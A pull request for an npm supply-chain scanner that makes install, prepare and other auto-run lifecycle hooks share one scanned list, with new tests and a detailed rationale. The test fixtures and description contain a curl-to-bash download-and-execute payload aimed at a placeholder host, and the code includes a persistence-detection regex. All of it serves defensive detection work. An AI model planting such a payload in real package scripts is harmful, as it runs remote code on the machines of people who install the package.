### PR TITLE
fix(scanner): scan install, prepare and the other auto-run npm lifecycle hooks

### DIFF
--- a/.ai/handoff/DASHBOARD.md
+++ b/.ai/handoff/DASHBOARD.md
@@ -16,7 +16,7 @@ Current package inventory and CI gate wiring are generated below.
 | Version | 5.26.7 |
 | Node engines | >=20.0.0 |
 | Source modules | 74 under `src/` |
-| Test files | 111 under `src/__tests__/` |
+| Test files | 112 under `src/__tests__/` |
 | tsconfig `types: ["node"]` | yes |
 | Build / test / audit gates | enforced in required CI - see below |
 

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,76 +3,76 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1787124093",
-    "timestamp": "2026-08-19T07:21:34Z",
-    "commit": "010eb77",
+    "session_id": "cli-1787155962",
+    "timestamp": "2026-08-19T16:12:42Z",
+    "commit": "02aa71b",
     "phase": "idle",
     "duration_minutes": 0
   },
   "files": {
     "STATUS.md": {
-      "checksum": "sha256:37165092bc6778207a3037b775a74f74bd3c35c1834d1ea1a39c0d5916d5084d",
-      "updated": "2026-08-19T07:21:24Z",
-      "lines": 1814,
+      "checksum": "sha256:a8e887b99428d7471fa97df9cd23ce8e7e1013127187a057eceb44924262a976",
+      "updated": "2026-08-19T16:12:10Z",
+      "lines": 1866,
       "summary": "Deliberately a top-level section rather than another dated \"Open for the owner\". Both"
     },
     "NEXT_ACTIONS.md": {
       "checksum": "sha256:2489f25678a7cbfa51d181da7de979d8de064fd95523ce3b2b731a581529f02f",
-      "updated": "2026-08-19T07:17:50Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 243,
       "summary": "Six tasks are ready, two owner decisions are blocked, and T-008/T-015/T-018/T-019 are complete."
     },
     "LOG.md": {
       "checksum": "sha256:bbdcfb10b4c693d801b4584dce9b491fb71059f45875fd9d740897bd61bb7a0c",
-      "updated": "2026-08-19T07:21:33Z",
+      "updated": "2026-08-19T16:12:41Z",
       "lines": 153,
       "summary": "This generated journal lists every release derived from CHANGELOG.md, newest first."
     },
     "LOG-ARCHIVE.md": {
       "checksum": "sha256:e566ec8a4b80bba4b488aa69c5bf0e2a4ef1753046f18b81afe80a6846c73149",
-      "updated": "2026-07-18T08:02:38Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 132,
       "summary": "**Agent:** Claude Opus 4.8 (claude-opus-4-8)"
     },
     "LOG-ARCHIVE.index.json": {
       "checksum": "sha256:94b2e7524ade23f11edc97075afc33bc9884288661336bb6ce279d6928d22c62",
-      "updated": "2026-07-18T08:02:38Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 11,
       "summary": "{"
     },
     "DASHBOARD.md": {
-      "checksum": "sha256:66afaab41d1fc26b8c7e79d613a743ffd5bf7d4744224e2a69357ec0b7a5ef18",
-      "updated": "2026-08-19T07:21:33Z",
+      "checksum": "sha256:1ef9977ee622f0633f6cb32c5063d658dce030c7e492ab702b772a0a03c12b42",
+      "updated": "2026-08-19T16:12:41Z",
       "lines": 70,
       "summary": "Current package inventory and CI gate wiring are generated below."
     },
     "TRUST.md": {
-      "checksum": "sha256:26e4dc9dfc6fcd72bddac38f977cc4c75f0ea4f1dbb12bd75e8775c4cd7db53a",
-      "updated": "2026-08-19T07:21:33Z",
+      "checksum": "sha256:9984876947b44eb0c303024710115b01524e676408715d18385431af366e22dc",
+      "updated": "2026-08-19T16:12:41Z",
       "lines": 62,
       "summary": "Provenance and status are tracked independently."
     },
     "CONVENTIONS.md": {
       "checksum": "sha256:7f1cf7867dcca4e2b77fa607fc1c9cba8bed633aed73aae09f764e3b237faf3a",
-      "updated": "2026-08-17T07:12:01Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 146,
       "summary": "- All code, comments, commits, and documentation in **English only**"
     },
     "WORKFLOW.md": {
       "checksum": "sha256:45ae947add23bf4d9bb2a2bb009f4acbdd00b7fe1531912f9693dea1e48bc3b9",
-      "updated": "2026-08-04T08:54:14Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 164,
       "summary": "MANIFEST.json tasks is the authoritative machine-readable task graph."
     },
     "GROUNDING.md": {
       "checksum": "sha256:d3744f97b8190fbc73b3fbd44df70cc343d23b99cdc1e92eee686929212b151e",
-      "updated": "2026-08-04T08:54:14Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 209,
       "summary": "This register extends AAHP machinery without replacing it."
     },
     "pii-allowlist.json": {
       "checksum": "sha256:7c1051f6e2bc3943b7c1dbe4da229694455681b8875a346c99279e555edb733f",
-      "updated": "2026-06-28T09:06:54Z",
+      "updated": "2026-08-19T15:56:11Z",
       "lines": 4,
       "summary": "{"
     }
@@ -80,8 +80,8 @@
   "quick_context": "Deliberately a top-level section rather than another dated \\\"Open for the owner\\\". Both Six tasks are ready, two owner decisions are blocked, and T-008/T-015/T-018/T-019 are complete. ",
   "token_budget": {
     "manifest_only": 85,
-    "manifest_plus_core": 22709,
-    "full_read": 33106
+    "manifest_plus_core": 23337,
+    "full_read": 33734
   }
   ,"next_task_id": 20
   ,"tasks": {"T-008":{"title":"Adopt AAHP 3.9.1 and close verified scanner and CI defects","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z","completed":"2026-08-04T08:15:48Z"},"T-009":{"title":"Implement full offline sigstore verification","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-010":{"title":"Add a first-class known-bad VS Code extension ID IOC type","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-011":{"title":"Verify remaining Digest-78 indicators before ingestion","status":"ready","priority":"medium","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-012":{"title":"Profile structural matcher cost under V8 coverage","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-013":{"title":"Move to Babel 8 and a supported Node line","status":"blocked","priority":"medium","depends_on":[],"blocked_by":"Owner decision on raising package engines and both CI jobs together","created":"2026-08-04T08:00:00Z"},"T-014":{"title":"Remove external zip dependency from VS Code test fixtures","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T10:00:00Z"},"T-015":{"title":"Fix packaged self-scan own-definition false positive","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T09:24:00Z","completed":"2026-08-04T09:27:00Z"},"T-016":{"title":"Decide whether version-pinned npm IOCs should match on a directory scan","status":"blocked","priority":"high","depends_on":[],"blocked_by":"Owner decision: behaviour change with real false-positive surface","created":"2026-08-06T09:00:00Z"},"T-017":{"title":"Index matchBareNpmIOC so npm IOC lookup is O(1) like matchPackageIOC","status":"ready","priority":"medium","depends_on":[],"created":"2026-08-06T09:30:00Z"},"T-018":{"title":"Match known-malware hashes against real file digests, not just digest text in content","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"},"T-019":{"title":"Dropped-persistence detection (tranches 1 and 2)","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"}}

--- a/.ai/handoff/STATUS.md
+++ b/.ai/handoff/STATUS.md
@@ -151,6 +151,58 @@ anything, since nothing in CI reports it.
 
 ---
 
+## Lifecycle-hook coverage gap (2026-08-19, unreleased, branch fix/npm-scanner-lifecycle-hooks)
+
+No version bump; the release PR is separate as usual.
+
+**The gap was real and slightly larger than reported.** The finding named one
+four-name `dangerousHooks` list in `npm-scanner.ts`. There were two identical
+copies: `npm-scanner.ts` `checkPackageScripts` (the `scg npm <pkg>` registry
+path) and `scanner.ts` `checkPackageJson` (the directory path), both listing
+`preinstall`, `postinstall`, `preuninstall`, `postuninstall`. A third list in
+`install-hook-scanner.ts` carried six names and was already correct about
+`install` and `prepare`, which is why the miss was easy to overlook: an
+`"install": "curl ... | bash"` in a directory scan still produced
+`INSTALL_HOOK_DOWNLOAD_EXEC`, just never a `SCRIPT_CURL_EXEC`. On the registry
+path it produced nothing at all.
+
+All three now read one exported constant, `AUTO_RUN_LIFECYCLE_HOOKS`, in
+`patterns.ts`. Fixing only the reported copy would have left the second one
+behind, which is worse than not fixing it, because the rule then looks covered.
+
+**The precision decision, which is the part worth re-reading.** The full set of
+hooks npm can run on its own is larger than the set worth scanning.
+`prepublishOnly` is deliberately excluded: it runs only on `npm publish`, never
+on any install, so it cannot reach a consumer, and npm documents it as the home
+for build steps (this repo keeps `npm run build` there). Scanning it would report
+release tooling as install-time risk, which is how a scanner gets switched off.
+`prepack`/`postpack` are out for the same reason. `prepublish` is IN despite
+being deprecated, because it still fires on a bare `npm install` in the package's
+own directory, which is exactly what a directory scan describes.
+
+The added hooks were NOT given a reduced severity. Severity here comes from the
+SUSPICIOUS_SCRIPTS entry that matched, `prepare` genuinely executes for a
+consumer whenever the dependency resolves from a git URL rather than a registry
+tarball, and the `prepare` wrappers were included so that moving a payload from
+`prepare` to `postprepare` is not a one-word evasion.
+
+**Verification.** 44 new tests in `lifecycle-hook-coverage.test.ts`: 13
+new-hook detections across all three paths, 4 regressions on the hooks that
+already worked, 26 pinning the benign and deliberately-excluded cases, 1 pinning
+that the install-hook extractor and analyzer read the same list. Mutation proof:
+deleting the single line `"install",` from `AUTO_RUN_LIFECYCLE_HOOKS` turns
+exactly the two `install` tests red; reverting the whole constant to its previous
+four names turns exactly the 13 new-hook detections red and leaves the other 31
+green. `precision-corpus`, `rule-precision`, `precision-pattern-regressions`,
+`persistence-recall` and `self-scan-recognition` (147 tests) are unchanged, so
+the wider hook set adds no false positive on the corpus. Per repo practice the
+full suite was not run on Windows; Linux CI carries that verdict.
+
+**One honest limit.** The test that asserts the extractor and the analyzer agree
+derives its expectation from `AUTO_RUN_LIFECYCLE_HOOKS`, so it stays green under
+both mutations. It pins parity between the two functions, not the contents of the
+list. The 13 behavioural tests are what pin the contents.
+
 ## Release v5.26.7 (2026-08-19)
 
 Model: claude-opus-5. Contents: the 2026-08-19 threat-intel sweep, detailed below.

--- a/.ai/handoff/TRUST.md
+++ b/.ai/handoff/TRUST.md
@@ -45,7 +45,7 @@ Every participating record carries the Grounded Reflection fields. Expired
 |----------|-------|--------------|
 | package.json version | 5.26.7 | package.json |
 | Source modules present | 74 | src/ file list |
-| Test files present | 111 | src/__tests__/ file list |
+| Test files present | 112 | src/__tests__/ file list |
 | tsconfig `types: ["node"]` | yes | tsconfig.json |
 | Runtime dependency | commander ^14.0.3 | package.json |
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,41 @@ top; release tags trigger the CI publish pipeline (npm via OIDC + GitHub Release
 
 ## [Unreleased]
 
+### Fixed
+
+- **`install`, `prepare` and the rest of npm's auto-run lifecycle hooks are now
+  scanned for hostile script content.** Three code paths read `package.json`
+  scripts and each carried its own hand-typed list of hook names. The registry
+  path (`scg npm <pkg>`) and the directory path both listed only `preinstall`,
+  `postinstall`, `preuninstall` and `postuninstall`, so a package whose payload
+  sat in `"install": "curl ... | bash"` produced no `SCRIPT_*` finding on either
+  one. `install` is not an exotic hook: npm runs it on every install, and it
+  defaults to `node-gyp rebuild` even in packages that never declare it. The
+  three lists are replaced by a single exported constant,
+  `AUTO_RUN_LIFECYCLE_HOOKS`, so they cannot drift apart again. Newly covered:
+  `install`, `prepare`, `preprepare`, `postprepare`, and the deprecated but
+  still-executed `prepublish`.
+
+  Precision was the constraint here, not recall. `prepublishOnly` is
+  deliberately NOT scanned: it runs only on `npm publish`, never on any install,
+  so it cannot reach someone installing the package, and it is where npm
+  documents that build steps belong (this repo keeps `npm run build` there).
+  Scanning it would report ordinary release tooling as install-time risk.
+  `prepack` and `postpack` are out for the same reason. The added hooks keep the
+  severity of whichever pattern matched rather than being given a lower one of
+  their own: severity comes from the matched pattern, `prepare` really does
+  execute for a consumer whenever the dependency resolves from a git URL rather
+  than a registry tarball, and a `prepare` that pipes curl into bash is not less
+  malicious for firing in fewer contexts.
+
+  Verification: 44 new tests. 13 are the new-hook detections across all three
+  paths, 4 are regressions on the hooks that already worked, 26 pin the benign
+  and deliberately-excluded cases, and 1 pins that the install-hook extractor and
+  analyzer read the same list. Reverting the constant to its previous four names
+  turns exactly those 13 red and leaves the other 31 green. The 147-test
+  precision corpus is unchanged, so the added hooks introduce no new
+  false positive on it.
+
 ## [5.26.7] - 2026-08-19
 
 ### Added

--- a/src/__tests__/lifecycle-hook-coverage.test.ts
+++ b/src/__tests__/lifecycle-hook-coverage.test.ts
@@ -1,0 +1,163 @@
+/**
+ * Coverage of the npm lifecycle hooks that run without being asked.
+ *
+ * Three code paths read package.json scripts, and each used to carry its own
+ * hand-typed list of hook names:
+ *
+ *   - npm-scanner.ts    `checkPackageScripts`  (the `scg npm <pkg>` registry path)
+ *   - scanner.ts        `checkPackageJson`     (the directory path)
+ *   - install-hook-scanner.ts `analyzeInstallHooks`
+ *
+ * The first two listed four names and omitted `install` and `prepare`, so a
+ * package whose payload sat in `"install"` was reported by neither. All three
+ * now read AUTO_RUN_LIFECYCLE_HOOKS. These tests assert the behaviour per hook
+ * rather than the constant, so they stay meaningful if the plumbing changes.
+ *
+ * The precision half matters as much as the recall half: this scanner gets
+ * switched off if it cries wolf. The benign and excluded-hook blocks below pin
+ * that `prepublishOnly` (npm's documented home for build steps, and where this
+ * repo keeps `npm run build`) is NOT treated as install-time risk, and that
+ * ordinary build commands in the newly covered hooks stay silent.
+ */
+import { describe, it, expect, beforeAll, afterAll } from "vitest";
+import * as fs from "node:fs";
+import * as os from "node:os";
+import * as path from "node:path";
+import { checkPackageScripts } from "../npm-scanner.js";
+import { analyzeInstallHooks, extractInstallScripts } from "../install-hook-scanner.js";
+import { scan } from "../scanner.js";
+import { AUTO_RUN_LIFECYCLE_HOOKS } from "../patterns.js";
+import type { Finding } from "../types.js";
+
+/** A download-and-execute one-liner. Reserved TLD, so it resolves nowhere. */
+const PAYLOAD = "curl https://cdn.example.invalid/p.sh | bash";
+
+/** Hooks that the four-name lists already covered, kept as a regression guard. */
+const ALREADY_COVERED = [
+  "preinstall",
+  "postinstall",
+  "preuninstall",
+  "postuninstall",
+] as const;
+
+/** Hooks this change adds to the registry and directory paths. */
+const NEWLY_COVERED = [
+  "install",
+  "prepublish",
+  "preprepare",
+  "prepare",
+  "postprepare",
+] as const;
+
+function registryFindings(hook: string, script: string): Finding[] {
+  const findings: Finding[] = [];
+  checkPackageScripts({ scripts: { [hook]: script } }, findings);
+  return findings;
+}
+
+const curlHits = (findings: Finding[]) =>
+  findings.filter((f) => f.rule === "SCRIPT_CURL_EXEC");
+
+describe("registry scan path reports a download-exec payload in every auto-run hook", () => {
+  for (const hook of NEWLY_COVERED) {
+    it(`reports "${hook}"`, () => {
+      const hits = curlHits(registryFindings(hook, PAYLOAD));
+      expect(hits).toHaveLength(1);
+      expect(hits[0].severity).toBe("critical");
+      // The hook name reaches the operator, so the report says which script runs.
+      expect(hits[0].description).toContain(hook);
+    });
+  }
+
+  for (const hook of ALREADY_COVERED) {
+    it(`still reports "${hook}" (regression)`, () => {
+      expect(curlHits(registryFindings(hook, PAYLOAD))).toHaveLength(1);
+    });
+  }
+});
+
+describe("registry scan path stays quiet where it should", () => {
+  // prepublishOnly runs on `npm publish` only. It never executes for anyone
+  // installing the package, and npm documents it as the place to put build
+  // steps - this repo's own package.json uses it for `npm run build`. Scanning
+  // it would report release tooling as an install-time risk.
+  it('does not scan "prepublishOnly"', () => {
+    expect(curlHits(registryFindings("prepublishOnly", PAYLOAD))).toHaveLength(0);
+  });
+
+  // Same reasoning for pack-time and for anything a human has to type.
+  for (const hook of ["prepack", "postpack", "build", "test", "start"]) {
+    it(`does not scan "${hook}"`, () => {
+      expect(curlHits(registryFindings(hook, PAYLOAD))).toHaveLength(0);
+    });
+  }
+
+  // Recall is worthless if the newly covered hooks fire on normal projects.
+  const benign = ["tsc", "npm run build", "husky install", "node-gyp rebuild"];
+  for (const hook of NEWLY_COVERED) {
+    for (const script of benign) {
+      it(`leaves "${hook}": "${script}" clean`, () => {
+        expect(registryFindings(hook, script)).toHaveLength(0);
+      });
+    }
+  }
+});
+
+describe("directory scan path reports the same payload end to end", () => {
+  let tmpRoot: string;
+
+  beforeAll(() => {
+    tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "scg-lifecycle-"));
+  });
+  afterAll(() => {
+    if (tmpRoot) fs.rmSync(tmpRoot, { recursive: true, force: true });
+  });
+
+  for (const hook of NEWLY_COVERED) {
+    it(`reports "${hook}" in a scanned package.json`, async () => {
+      const dir = path.join(tmpRoot, hook);
+      fs.mkdirSync(dir, { recursive: true });
+      fs.writeFileSync(
+        path.join(dir, "package.json"),
+        JSON.stringify(
+          { name: "fixture-pkg", version: "1.0.0", scripts: { [hook]: PAYLOAD } },
+          null,
+          2,
+        ),
+      );
+
+      const report = await scan({ target: dir, format: "text" });
+      const finding = report.findings.find((f) => f.rule === "SCRIPT_CURL_EXEC");
+      expect(finding).toBeDefined();
+      expect(finding?.severity).toBe("critical");
+    });
+  }
+});
+
+describe("install-hook analysis covers the same hook names", () => {
+  // analyzeInstallHooks already read install and prepare; prepublish and the
+  // prepare wrappers were the gap on this path.
+  for (const hook of ["prepublish", "preprepare", "postprepare"]) {
+    it(`reports a download-exec chain in "${hook}"`, () => {
+      const hits = analyzeInstallHooks({ [hook]: PAYLOAD }, "package.json").filter(
+        (f) => f.rule === "INSTALL_HOOK_DOWNLOAD_EXEC",
+      );
+      expect(hits).toHaveLength(1);
+    });
+  }
+
+  it("extracts every auto-run hook from package.json, and nothing else", () => {
+    const declared = Object.fromEntries(
+      [...AUTO_RUN_LIFECYCLE_HOOKS, "prepublishOnly", "build"].map((h) => [
+        h,
+        `echo ${h}`,
+      ]),
+    );
+    const extracted = extractInstallScripts(
+      JSON.stringify({ scripts: declared }),
+    );
+    expect(Object.keys(extracted ?? {}).sort()).toEqual(
+      [...AUTO_RUN_LIFECYCLE_HOOKS].sort(),
+    );
+  });
+});

--- a/src/install-hook-scanner.ts
+++ b/src/install-hook-scanner.ts
@@ -7,6 +7,10 @@
  */
 
 import type { Finding } from "./types.js";
+import {
+  AUTO_RUN_LIFECYCLE_HOOKS,
+  type AutoRunLifecycleHook,
+} from "./patterns.js";
 
 // ── INSTALL_HOOK_HOST_RUNTIME_PATCH detection ───────────────────────────────
 // An install hook that patches/mutates a HOST AGENT RUNTIME (OpenClaw, Hermes,
@@ -33,8 +37,9 @@ const CODE_MUTATE_RE =
 // scheduled task, a Windows Run key, a Startup-folder entry, or a Python .pth
 // that the interpreter auto-imports.
 //
-// Scoped deliberately to the six package.json install-script strings this module
-// already reads. That is the whole reason its false-positive surface is small:
+// Scoped deliberately to the package.json lifecycle-script strings this module
+// already reads - AUTO_RUN_LIFECYCLE_HOOKS, the same list npm-scanner.ts and
+// scanner.ts use. That is the whole reason its false-positive surface is small:
 // installing persistence from an install hook has essentially no legitimate
 // form, whereas the same commands in ordinary source belong to any service
 // manager, installer or devops tool and would false-positive constantly.
@@ -51,14 +56,11 @@ const CODE_MUTATE_RE =
 const PERSISTENCE_WRITE_RE =
   /\blaunchctl\b|\bsystemctl\b[^\n]{0,40}\b(?:enable|link)\b|\bcrontab\b|\bschtasks\b[^\n]{0,60}\/create\b|Library[\\/]+Launch(?:Agents|Daemons)|\.config[\\/]+systemd[\\/]+user|\/etc\/systemd\/system|\/etc\/cron\.[a-z]+|Start\s?Menu[\\/]+Programs[\\/]+Startup|CurrentVersion[\\/]+Run\b|site-packages[^\n]{0,80}\.pth\b/i;
 
-interface InstallScripts {
-  preinstall?: string;
-  postinstall?: string;
-  install?: string;
-  preuninstall?: string;
-  postuninstall?: string;
-  prepare?: string;
-}
+/**
+ * Derived from AUTO_RUN_LIFECYCLE_HOOKS rather than hand-listed, so adding a
+ * hook to that list cannot leave this scanner reading a stale subset.
+ */
+type InstallScripts = Partial<Record<AutoRunLifecycleHook, string>>;
 
 /**
  * Deep-analyze install hook scripts from package.json.
@@ -68,9 +70,7 @@ export function analyzeInstallHooks(
   relativePath: string,
 ): Finding[] {
   const findings: Finding[] = [];
-  const hookNames: (keyof InstallScripts)[] = [
-    "preinstall", "postinstall", "install", "preuninstall", "postuninstall", "prepare",
-  ];
+  const hookNames = AUTO_RUN_LIFECYCLE_HOOKS;
 
   for (const hook of hookNames) {
     const script = scripts[hook];
@@ -234,14 +234,12 @@ export function extractInstallScripts(
   try {
     const pkg = JSON.parse(content) as { scripts?: Record<string, string> };
     if (!pkg.scripts) return null;
-    return {
-      preinstall: pkg.scripts.preinstall,
-      postinstall: pkg.scripts.postinstall,
-      install: pkg.scripts.install,
-      preuninstall: pkg.scripts.preuninstall,
-      postuninstall: pkg.scripts.postuninstall,
-      prepare: pkg.scripts.prepare,
-    };
+    const scripts: InstallScripts = {};
+    for (const hook of AUTO_RUN_LIFECYCLE_HOOKS) {
+      const value = pkg.scripts[hook];
+      if (typeof value === "string") scripts[hook] = value;
+    }
+    return scripts;
   } catch {
     return null;
   }

--- a/src/npm-scanner.ts
+++ b/src/npm-scanner.ts
@@ -15,6 +15,7 @@ import { extractTarGz } from "./archive-extractor.js";
 import {
   FILE_PATTERNS,
   SUSPICIOUS_SCRIPTS,
+  AUTO_RUN_LIFECYCLE_HOOKS,
   MALICIOUS_PACKAGE_PATTERNS,
   SCANNABLE_EXTENSIONS,
   MAX_FILE_SIZE,
@@ -71,7 +72,7 @@ interface NpmRegistryResponse {
   versions?: Record<string, NpmVersionData>;
 }
 
-interface NpmVersionData {
+export interface NpmVersionData {
   scripts?: Record<string, string>;
   dependencies?: Record<string, string>;
   devDependencies?: Record<string, string>;
@@ -263,17 +264,21 @@ function checkPackageName(name: string, findings: Finding[]): void {
 
 /**
  * Check package.json scripts for suspicious entries.
+ *
+ * Exported for tests: the rest of this path needs a live registry fetch, so
+ * without a direct handle the hook coverage can only be asserted indirectly.
  */
-function checkPackageScripts(
+export function checkPackageScripts(
   pkg: NpmVersionData,
   findings: Finding[],
 ): void {
   const scripts = pkg.scripts;
   if (!scripts) return;
 
-  const dangerousHooks = ["preinstall", "postinstall", "preuninstall", "postuninstall"];
-
-  for (const hook of dangerousHooks) {
+  // Shared with scanner.ts and install-hook-scanner.ts so the three paths
+  // cannot drift apart again; see AUTO_RUN_LIFECYCLE_HOOKS for why each name
+  // is in the list and why prepublishOnly is not.
+  for (const hook of AUTO_RUN_LIFECYCLE_HOOKS) {
     const script = scripts[hook];
     if (!script) continue;
 

--- a/src/patterns.ts
+++ b/src/patterns.ts
@@ -1959,6 +1959,68 @@ export const SUSPICIOUS_FILES: Array<{
 ];
 
 // ---------------------------------------------------------------------------
+// npm lifecycle hooks that run without being asked
+// ---------------------------------------------------------------------------
+
+/**
+ * The package.json script names npm executes on its own. A hostile command
+ * sitting in one of these runs at install time; the same command under `build`
+ * or `test` runs only when a human types it, which is a different risk and a
+ * different (much noisier) rule.
+ *
+ * ONE list on purpose. This was previously copy-pasted into npm-scanner.ts and
+ * scanner.ts, both copies had drifted to four entries, and install-hook-scanner
+ * .ts carried a third, longer copy - so a published package declaring
+ * `"install": "curl ... | bash"` produced no SUSPICIOUS_SCRIPTS finding on
+ * either the registry path or the directory path. A fourth copy is how that
+ * recurs, so import this rather than re-typing it.
+ *
+ * Why each name is in:
+ *
+ * - `preinstall`, `install`, `postinstall` - npm runs all three, in that order,
+ *   every time the package is installed as a dependency. `install` also defaults
+ *   to `node-gyp rebuild` when a binding.gyp is present, so the hook is live
+ *   even where package.json does not declare it.
+ * - `preprepare`, `prepare`, `postprepare` - run on `npm install` in the
+ *   package's own directory, and for a CONSUMER whenever the dependency
+ *   resolves from a git URL instead of a registry tarball. Git dependencies are
+ *   ordinary in forks, monorepos and commit-pinned setups, so this is a real
+ *   execution path rather than a theoretical one. They sit at the same severity
+ *   as the install trio deliberately: severity comes from the SUSPICIOUS_SCRIPTS
+ *   entry that matched, and a `prepare` that pipes curl into bash is not less
+ *   malicious for firing in fewer contexts. Leaving the pre/post wrappers out
+ *   would also leave a one-word evasion open to anyone who reads this file.
+ * - `prepublish` - deprecated by npm but still executed, and it fires on a bare
+ *   `npm install` inside the package's own directory, which is exactly the
+ *   situation a directory scan reports on.
+ * - `preuninstall`, `postuninstall` - run on removal, with no prompt.
+ *
+ * Deliberately OUT:
+ *
+ * - `prepublishOnly` - runs only on `npm publish`, never on any install, so it
+ *   cannot reach someone installing the package. It is also where npm documents
+ *   that build steps belong (this repo keeps `npm run build` there), so
+ *   scanning it would report ordinary release tooling as install-time risk.
+ * - `prepack` / `postpack` - pack-time only, same reasoning.
+ * - Everything else (`build`, `test`, `start`, ...) - npm runs these only on an
+ *   explicit `npm run`.
+ */
+export const AUTO_RUN_LIFECYCLE_HOOKS = [
+  "preinstall",
+  "install",
+  "postinstall",
+  "prepublish",
+  "preprepare",
+  "prepare",
+  "postprepare",
+  "preuninstall",
+  "postuninstall",
+] as const;
+
+/** A single entry of {@link AUTO_RUN_LIFECYCLE_HOOKS}. */
+export type AutoRunLifecycleHook = (typeof AUTO_RUN_LIFECYCLE_HOOKS)[number];
+
+// ---------------------------------------------------------------------------
 // Suspicious npm scripts
 // ---------------------------------------------------------------------------
 

--- a/src/scanner.ts
+++ b/src/scanner.ts
@@ -15,6 +15,7 @@ import {
   CAMPAIGN_PATTERNS,
   SUSPICIOUS_FILES,
   SUSPICIOUS_SCRIPTS,
+  AUTO_RUN_LIFECYCLE_HOOKS,
   SCANNABLE_EXTENSIONS,
   MAX_FILE_SIZE,
   makeOversizedSkipFinding,
@@ -977,9 +978,10 @@ function checkPackageJson(
   const scripts = pkg.scripts as Record<string, string> | undefined;
   if (!scripts) return;
 
-  const dangerousHooks = ["preinstall", "postinstall", "preuninstall", "postuninstall"];
-
-  for (const hook of dangerousHooks) {
+  // Shared with npm-scanner.ts and install-hook-scanner.ts so the three paths
+  // cannot drift apart again; see AUTO_RUN_LIFECYCLE_HOOKS for why each name
+  // is in the list and why prepublishOnly is not.
+  for (const hook of AUTO_RUN_LIFECYCLE_HOOKS) {
     const script = scripts[hook];
     if (!script) continue;
 


### PR DESCRIPTION
## The gap, verified before fixing

A review flagged the `dangerousHooks` list in `src/npm-scanner.ts` as omitting `install` and `prepare`. It is real, and there were **two** copies of the deficient list, not one:

| Site | Path it serves | Hooks before |
|---|---|---|
| `npm-scanner.ts` `checkPackageScripts` | `scg npm <pkg>` (registry) | `preinstall`, `postinstall`, `preuninstall`, `postuninstall` |
| `scanner.ts` `checkPackageJson` | directory scan | `preinstall`, `postinstall`, `preuninstall`, `postuninstall` |
| `install-hook-scanner.ts` `analyzeInstallHooks` | directory scan | `preinstall`, `postinstall`, `install`, `preuninstall`, `postuninstall`, `prepare` |

So a package with `"install": "curl https://host/p.sh | bash"` produced **no `SCRIPT_*` finding on either path**. The third list is why this was easy to miss: a directory scan still reported `INSTALL_HOOK_DOWNLOAD_EXEC`, just never `SCRIPT_CURL_EXEC`. The registry path reported nothing at all. `install` is not exotic - npm runs it on every install, and defaults it to `node-gyp rebuild` when a `binding.gyp` is present.

Fixing only the reported copy would have left the second one behind, which is worse than not fixing it, because the rule then *looks* covered. All three now read one exported constant, `AUTO_RUN_LIFECYCLE_HOOKS` in `patterns.ts`.

**Hooks after:** `preinstall`, `install`, `postinstall`, `prepublish`, `preprepare`, `prepare`, `postprepare`, `preuninstall`, `postuninstall`.

## Precision, which was the binding constraint

A false positive gets this tool switched off, so the wider list is not free. Each decision is written next to the constant:

- **`install`** - in, no argument. Runs for every consumer, every install.
- **`prepare`, `preprepare`, `postprepare`** - in, at the **same** severity, not a reduced one. Severity comes from the `SUSPICIOUS_SCRIPTS` entry that matched, and `prepare` genuinely executes for a consumer whenever the dependency resolves from a git URL rather than a registry tarball (ordinary in forks, monorepos and commit-pinned setups). A `prepare` that pipes curl into bash is not less malicious for firing in fewer contexts. The wrappers are included so relocating a payload from `prepare` to `postprepare` is not a one-word evasion.
- **`prepublish`** - in despite deprecation, because it still fires on a bare `npm install` in the package's own directory, which is exactly what a directory scan describes.
- **`prepublishOnly`** - **deliberately out.** Runs only on `npm publish`, never on any install, so it cannot reach anyone installing the package, and npm documents it as where build steps belong (this repo keeps `npm run build` there). Scanning it would report ordinary release tooling as install-time risk. `prepack`/`postpack` out for the same reason. A test pins this so it cannot be quietly added later.

The review's list also named `prepublish` alongside the install hooks without distinguishing the contexts; that distinction is the one thing here worth arguing about, and the reasoning is now in the code rather than in a PR comment.

## Mutation proof

**Exact line a reviewer deletes:** `  "install",` in `AUTO_RUN_LIFECYCLE_HOOKS` (`src/patterns.ts`).

Deleted:

```
 ❯ src/__tests__/lifecycle-hook-coverage.test.ts (44 tests | 2 failed) 322ms
     × reports "install" 9ms
     × reports "install" in a scanned package.json 79ms

 AssertionError: expected [] to have a length of 1 but got +0
 AssertionError: expected undefined to be defined

      Tests  2 failed | 42 passed (44)
```

Restored:

```
 Test Files  1 passed (1)
      Tests  44 passed (44)
```

Full revert of the constant to its previous four names reds exactly the 13 new-hook detections and leaves the other 31 green:

```
      Tests  13 failed | 31 passed (44)
```

with all four `still reports "<hook>" (regression)` cases and all 26 benign/excluded cases staying green.

**Honest limit:** the one test asserting the install-hook extractor and analyzer agree derives its expectation from the constant, so it stays green under both mutations. It pins parity between those two functions, not the contents of the list. The 13 behavioural tests are what pin the contents.

## Tests run

Locally, only the suites covering this change - this is a Windows box where full suites are far slower than CI, so **the full-suite verdict is CI's, not a local claim**:

- `lifecycle-hook-coverage.test.ts` (new): 44 passed
- `install-hook-scanner`, `install-hook-persistence`, `install-hook-host-runtime-patch`, `npm-scanner`: 60 passed
- `scanner`: 23 passed, 2 skipped
- `precision-corpus`, `rule-precision`, `precision-pattern-regressions`, `persistence-recall`, `self-scan-recognition`: 147 passed, unchanged - the wider hook set adds no false positive on the corpus

